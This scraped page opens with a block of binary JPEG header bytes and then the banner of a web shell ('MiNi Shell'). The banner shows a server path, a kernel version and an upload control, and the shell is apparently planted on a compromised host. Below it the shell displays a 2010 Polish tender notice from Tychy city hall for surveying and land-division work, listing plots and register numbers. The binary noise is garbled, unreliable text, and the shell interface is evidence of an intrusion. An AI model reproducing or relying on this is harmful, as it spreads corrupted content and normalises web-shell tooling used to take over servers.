JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100920/256767-N-2010.html

<p class="kh_header"><b>Tychy: Wykonanie prac geodezyjnych dla Wydziału Gospodarki Nieruchomościami Urzędu Miasta Tychy</b><br>
<b>Numer ogłoszenia: 256767 - 2010; data zamieszczenia: 20.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tychy , Al. Niepodległości 49, 43-100 Tychy, woj. śląskie, tel. (032) 7763333, faks (032) 7763344.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umtychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac geodezyjnych dla Wydziału Gospodarki Nieruchomościami Urzędu Miasta Tychy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
Zamówienie składa się z 3 zadań:
Zadanie nr 1
1.	Podział geodezyjny nieruchomości ze wstępnym projektem podziału:
działka nr 4768/70 o powierzchni 28 638 m2, KW KA1T/00019073/8, własność Gmina, 
- wydzielenie gruntu o powierzchni ok. 4 500 m2 przy ul. Czystej z przeznaczeniem do sprzedaży  zgodnie z decyzją o ustaleniu lokalizacji inwestycji celu publicznego,
- termin wykonania 6 miesięcy od daty podpisania umowy,
2.  Podział geodezyjny nieruchomości ze wstępnym projektem podziału:
działka nr 1783/90 o powierzchni 22 556 m2, KW KA1T/00020644/2, własność Gmina, ul. Hlonda
-  wydzielenie działki o powierzchni około 4 500 m2 z przeznaczeniem do sprzedaży zgodnie   z decyzją o udzieleniu lokalizacji inwestycji celu publicznego,
-  wydzielenie działki o powierzchni około 3 000 m2 z przeznaczeniem do sprzedaży zgodnie z decyzją ustalającą warunki zabudowy dla inwestycji: Budowa budynku przychodni specjalistycznej wraz z zagospodarowaniem terenu,
-    termin wykonania 6 miesięcy od daty podpisania umowy
3.	Podział geodezyjny nieruchomości ze wstępnym projektem podziału:
            działka nr 2772/106 o powierzchni 273 m2, KW KA1T/00002164/1, własność osoba fizyczna,
- podział nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym Szafirków,
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału w ilości 6 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy
4. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Źródlanej:
działka nr 648/34 o powierzchni 778 m2, KW KA1T/00002430/7, własność Gmina Tychy, użytkowanie wieczyste osoba fizyczna,
- podział zgodnie z istniejącym pasem drogowym (po ogrodzeniu działki),
- wykonanie projektu podziału w ilości 6 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział.
- termin wykonania 6 miesięcy od daty podpisania umowy.
5. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu prawnego gruntów zajętych pasem drogowym ul. Czarnej i Zwierzynieckiej:
działka nr 642/262 o powierzchni 4562 m2, KW KA1T/00000013/4, własność osoba fizyczna
- wykonanie projektu podziału w ilości 5 egzemplarzy,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.
6. Wykonanie prac geodezyjnych obejmujących:
a. podział geodezyjny ze wstępnym projektem podziału działki nr 625/11 o powierzchni 361 m2, KW KA1T/00009850/6, własność Gmina,
b. okazanie granic działki nr 479 o powierzchni 769 m2, KW KA1T/00001572/7, własność osób fizycznych (podlega wykupowi przez Gminę Tychy)  w celu przekazania w administrowanie MZUiM 
- okazanie granic działki 479 w terminie 1 miesiąca od daty podpisania umowy,
- okazanie granic obu nieruchomości w terenie na etapie podziału działki nr 625/11,
- zawiadomienie MZUiM Tychy o terminie okazania granic działek,
- wykonanie projektu podziału w ilości 5 egzemplarzy,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.
7. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Konwalii:
działka nr 148 o powierzchni 875 m2, KW KA1T/00010840/3, własność osoba fizyczna,
- podział zgodnie z istniejącym pasem drogowym (po ogrodzeniu działki),
- wykonanie projektu podziału w ilości 5 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.
8. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Żarnowiecka
a. działka nr 1210/28 o powierzchni 595 m2, KW 11975, własność osoba fizyczna,
b. działka nr 1213/28 o powierzchni 632 m2, KW 11975, własność osoba fizyczna,
c. działka nr 1676/32 o powierzchni 870 m2, KW KA1T/00037334/8, własność osoba fizyczna,
d. działka nr 1677/32 o powierzchni 944 m2, KW 3043, własność osoba fizyczna,
e. działka nr 1230/32 o powierzchni 393 m2, KW 12502, własność osoba fizyczna,
f. działka nr 1231/32 o powierzchni 760 m2, KW KA1T/00000060/8, własność osoba fizyczna.
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału dla każdej działki w ilości 4 egzemplarze plus ilość właścicieli,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.
9. Okazanie granic nieruchomości w celu przekazania w administrowanie MZUiM:
działki nr: 160, 161, 162 o łącznej powierzchni 236 m2, KW 10227, własność Gmina,
- okazanie granic nieruchomości w terenie,
- zawiadomienie MZUiM Tychy o terminie okazania granic,
- termin wykonania 2 miesiące od daty podpisania umowy.
10. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Leszczynowej:
a. działka nr 1325/41 o powierzchni 180 m2, KW nr 3444, własność osoba fizyczna,
b. działka nr 102/49 o powierzchni 868 m2, KW 7552, własność osoba fizyczna,
c. działka nr 133/49 o powierzchni 334 m2, KW 12159, własność osoba fizyczna,
d. działka nr 134/49 o powierzchni 867 m2, KW 12159, własność osoba fizyczna,
e. działka nr 135/63 o powierzchni 1260 m2, KW 12160, własność osoba fizyczna,
f. działka nr 804/41 o powierzchni 936 m2, KW 3816, własność osoba fizyczna,
g. działka nr 1809/41 o powierzchni 976 m2, KW 3756, własność osoba fizyczna,
h. działka nr 171/50 o powierzchni 661 m2, KW 13380, własność osoba fizyczna.
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału dla każdej działki w ilości 4 egzemplarzy plus ilość właścicieli,
- termin wykonania 6 miesięcy od daty podpisania umowy.
11. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów   zajętych pasem drogowym ul. Mąkołowskiej:
     działka nr 353/33 o powierzchni 1433 m2, KW KA1T/00000212/9, własność osoba fizyczna,
     - okazanie granic nieruchomości w terenie,
     - wykonanie projektu podziału w ilości 7 egzemplarzy,
     - stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział,
     - termin wykonania 6 miesięcy od daty podpisania umowy.
12. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Modrzewiowej:
a.	działka nr 922/41 o powierzchni 1610 m2, KW nr 11795, własność osoba fizyczna,
b.	działka nr 921/41 o powierzchni 1250 m2, KW nr 7579, własność osoba fizyczna,
c.	działka nr 1271/43 o powierzchni 498 m2, KW nr 2314, własność osoba fizyczna,
d.	działka nr 429/41 o powierzchni 1435 m2, KW nr 3240, własność osoba fizyczna,
e.	działka nr 428/41 o powierzchni 1123 m2, KW nr 3264, własność osoba fizyczna,
f.	działka nr 791/41 o powierzchni 1442 m2, KW nr 5908, własność osoba fizyczna,
g.	działka nr 1786/41 o powierzchni 2444 m2, KW nr 3444, własność osoba fizyczna,
h.	działka nr 1729/41 o powierzchni 927 m2, KW nr 30562, własność osoba fizyczna.
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału dla każdej działki w ilości 4 egzemplarzy plus ilość właścicieli,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.

Zadanie nr 2
1.	W trybie art. 96 ust. 1b w związku z art. 95 ust. 4 ustawy o gospodarce nieruchomościami: 
   
a.	Wykonanie projektu podziału nieruchomości położonej w Tychach przy ul. Poziomkowej, obejmującej działkę nr 2 170/17 o powierzchni 3 049 m2, KW KA1T/00005669/2, własność Gmina, w celu wydzielenia i pozostawienia na własność Gminy drogi dojazdowej do zespołu garaży sąsiadujących z przedmiotową działką. 
b.	Wykonanie projektu podziału nieruchomości położonej w Tychach przy ul. Jagiełły, obejmującej działkę nr 582/474 o powierzchni 3 043 m2, KW KA1T/00009850/6, własność Gmina, w celu wydzielenia działki do zwrotu.
c.	Wykonanie projektu podziału nieruchomości położonej w Tychach przy ul. Armii Krajowej, obejmującej działkę nr 1688/37 o powierzchni 10 353 m2, KW KA1T/00013435/2, własność Gmina, w celu wydzielenia działki do zwrotu.

2.	Namierzenie na mapie zasadniczej poszczególnych budynków wchodzących w skład kompleksu garaży położonych przy ulicy Rodakowskiego, na działce oznaczonej nr 2328/5 o powierzchni 3 633 m2.
Zadanie nr 3
Podział geodezyjny nieruchomości dla regulacji stanu prawnego w trybie art. 73 ustawy z dnia 13.10.1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. 98, Nr 133, poz. 872 z późn. zm.)- projekt podziału bez wstępnego projektu:
- działka nr 1069/42 o powierzchni 109 m2, KW KA1T/00011606/8, własność osoba fizyczna,
- podział zgodnie z istniejącym pasem drogowym (wzdłuż chodnika),
- wykonanie projektu podziału w ilości 6 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji przez Wojewodę Śląskiego.

Zamówienie musi zostać zrealizowane w terminie: 
Zadanie nr 1 - 6 miesięcy od daty podpisania umowy,
Zadanie nr 2 - 6 tygodni od daty podpisania umowy,
Zadanie nr 3 - 2 miesiące od daty podpisania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wymagane jest dysponowanie 1 osobą z uprawnieniami geodezyjnymi obejmującymi: geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i inwentaryzacyjne oraz  rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,
- wymagane jest posiadanie ww. dokumentu o wartości minimum 50 000,00 zł, 
(niezależnie od ilości zadań, do których przystąpi Wykonawca)
Do oferty należy dołączyć potwierdzenie opłacenia polisy lub fakt opłacenia musi wynikać z treści dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne oświadczenia lub dokumenty niezbędne do przeprowadzenia postępowania, które należy dołączyć do oferty:
a.	Załącznik nr 1 do SIWZ - wypełniony formularz oferty,
b.	Załącznik nr 1a, 1b, 1c - wypełniony formularz opis przedmiotu zamówienia oraz ceny jednostkowe,
c.	Pełnomocnictwo lub umowa podmiotów występujących wspólnie wskazujące, że osoba występująca w imieniu Wykonawcy jest do tego upoważniona, jeżeli nie wynika to z załączonych do oferty dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo do zmiany przedmiotu zamówienia w przypadku wystąpienia przynajmniej jednej z następujących przyczyn: 
a)	wycofania wniosku o podział przez właściciela działki;
b)	niewyrażenia zgody właściciela działki na wejście w teren i dokonanie podziału;
c)	nieuregulowany stan prawny nieruchomości;
d)	niezgodności podziału z miejscowym planem zagospodarowania przestrzennego lub decyzją ustalającą warunki zabudowy;
e)	braku zgody Wydziału Architektury na zatwierdzenie podziału;
f)	wycofania Zamawiającego z prowadzonych inwestycji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umtychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tychy
Wydział Gospodarki Nieruchomościami pok.720
al. Niepodległości 49
43-100 Tychy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2010 godzina 10:15, miejsce: Urząd Miasta Tychy
Wydział Gospodarki Nieruchomościami pok.720
al. Niepodległości 49
43-100 Tychy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1.	Podział geodezyjny nieruchomości ze wstępnym projektem podziału:
działka nr 4768/70 o powierzchni 28 638 m2, KW KA1T/00019073/8, własność Gmina, 
- wydzielenie gruntu o powierzchni ok. 4 500 m2 przy ul. Czystej z przeznaczeniem do sprzedaży  zgodnie z decyzją o ustaleniu lokalizacji inwestycji celu publicznego,
- termin wykonania 6 miesięcy od daty podpisania umowy,
2.  Podział geodezyjny nieruchomości ze wstępnym projektem podziału:
działka nr 1783/90 o powierzchni 22 556 m2, KW KA1T/00020644/2, własność Gmina, ul. Hlonda
-  wydzielenie działki o powierzchni około 4 500 m2 z przeznaczeniem do sprzedaży zgodnie   z decyzją o udzieleniu lokalizacji inwestycji celu publicznego,
-  wydzielenie działki o powierzchni około 3 000 m2 z przeznaczeniem do sprzedaży zgodnie z decyzją ustalającą warunki zabudowy dla inwestycji: Budowa budynku przychodni specjalistycznej wraz z zagospodarowaniem terenu,
-    termin wykonania 6 miesięcy od daty podpisania umowy
3.	Podział geodezyjny nieruchomości ze wstępnym projektem podziału:
            działka nr 2772/106 o powierzchni 273 m2, KW KA1T/00002164/1, własność osoba fizyczna,
- podział nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym Szafirków,
- okazanie granic nieruchomości w terenie,
- wykonanie projektu podziału w ilości 6 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy
4. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu gruntów zajętych pasem drogowym ul. Źródlanej:
działka nr 648/34 o powierzchni 778 m2, KW KA1T/00002430/7, własność Gmina Tychy, użytkowanie wieczyste osoba fizyczna,
- podział zgodnie z istniejącym pasem drogowym (po ogrodzeniu działki),
- wykonanie projektu podziału w ilości 6 egzemplarzy,
- stabilizacja znaków granicznych po wydaniu decyzji zatwierdzającej podział.
- termin wykonania 6 miesięcy od daty podpisania umowy.
5. Podział geodezyjny ze wstępnym projektem podziału nieruchomości dla regulacji stanu prawnego gruntów zajętych pasem drogowym ul. Czarnej i Zwierzynieckiej:
działka nr 642/262 o powierzchni 4562 m2, KW KA1T/00000013/4, własność osoba fizyczna
- wykonanie projektu podziału w ilości 5 egzemplarzy,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
- termin wykonania 6 miesięcy od daty podpisania umowy.
6. Wykonanie prac geodezyjnych obejmujących:
a. podział geodezyjny ze wstępnym projektem podziału działki nr 625/11 o powierzchni 361 m2, KW KA1T/00009850/6, własność Gmina,
b. okazanie granic działki nr 479 o powierzchni 769 m2, KW KA1T/00001572/7, własność osób fizycznych (podlega wykupowi przez Gminę Tychy)  w celu przekazania w administrowanie MZUiM 
- okazanie granic działki 479 w terminie 1 miesiąca od daty podpisania umowy,
- okazanie granic obu nieruchomości w terenie na etapie podziału działki nr 625/11,
- zawiadomienie MZUiM Tychy o terminie okazania granic działek,
- wykonanie projektu podziału w ilości 5 egzemplarzy,
- stabilizacja znaków graficznych po wydaniu decyzji zatwierdzającej podział,
